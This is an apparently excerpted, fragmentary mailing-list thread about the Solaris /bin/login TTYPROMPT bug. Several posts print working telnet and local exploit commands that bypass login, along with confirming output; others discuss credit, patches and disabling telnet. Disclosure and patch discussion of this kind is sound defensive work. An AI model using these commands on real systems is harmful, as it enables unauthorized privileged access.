Hi.
On Wed, Oct 02, 2002 at 12:00:38PM -0400, buzheng wrote:
But, the remote setting of TTYPROMPT does matter. You cannot succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
Which is plain wrong. This may be
This is nothing more than a newly disclosed way of exploiting an old
bug, hardly newsworthy unless you're in the dot slash hacking business. In
the spirit of giving credit where credit is due, I'd like to note that the
bug was originally found by duke (ISS/ADM) of course. This method of
On Wed, 02 Oct 2002, you wrote:
But, the remote setting of TTYPROMPT does matter. You cannot succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
I have heard several conflicting reports on this matter and there
Works like a champ on Solaris 2.6/Sparc:
-- begin --
~ $ telnet
telnet environ define TTYPROMPT abcdef
telnet o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.6
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
In-Reply-To: [EMAIL PROTECTED]
This exploit can also be done local to gain higher priv's
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c/n
tester:bin#
Patches to resolve
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
Hello,
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT. This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
However, a very simple
Sorry but I can't reproduce this on a Solaris 7 machine.
sunlight.ccs% telnet
telnet environ define TTYPROMPT abcdef
telnet o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.7
login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
On Wed, 2 Oct 2002, buzheng wrote:
I do not think this is a new bug.
I completely agree.
But, the remote setting of TTYPROMPT does matter. You cannot succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
That's
Another thing, if you tcpwrap your telnet sessions, you can prevent
localhost telnets.
Ramon Kagan
York University, Computing and Network Services
Unix Team - Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]
-
I have not failed. I
Apparently, Dave Ahmad wrote:
%
% These may be fixes for this vulnerability, however they apply to telnetd
% and this vulnerability has to be in login.
So it makes more sense to apply the right patches to login, and not
patches to telnetd. If you only want to install the necessary patches
to
Hello,
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT. This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
However, a very simple exploit, which does not require any code to be
compiled by an
I have confirmed this on a fresh Solaris 8/sparc install.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
Last login: Wed Oct 2
I do not think this is a new bug.
Actually, the overflow is not at changing the ttyprompt remotely.
In fact, if you just use a, instead of abcdef, as TTYPROMPT, it will
still work.
The overflow is that long user name with multiple spaces, all the c
will be taken as environment. It is the very
On Wed, 2 Oct 2002, Dave Ahmad wrote:
I suggest that everyone here who still uses telnet disable it immediately.
. . or install the latest Recommended patch cluster, which you should have
done anyway.
These may be fixes for this vulnerability, however they apply to telnetd
and this
this finding's origin, I think credits must be given due... I'll be waiting for a
clarification from Mr. Stuart.
thanks,
sinan
-Original Message-
From: Jonathan S [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, October 02, 2002 9:13 AM
To: [EMAIL PROTECTED]
Subject: Solaris 2.6, 7, 8
Hello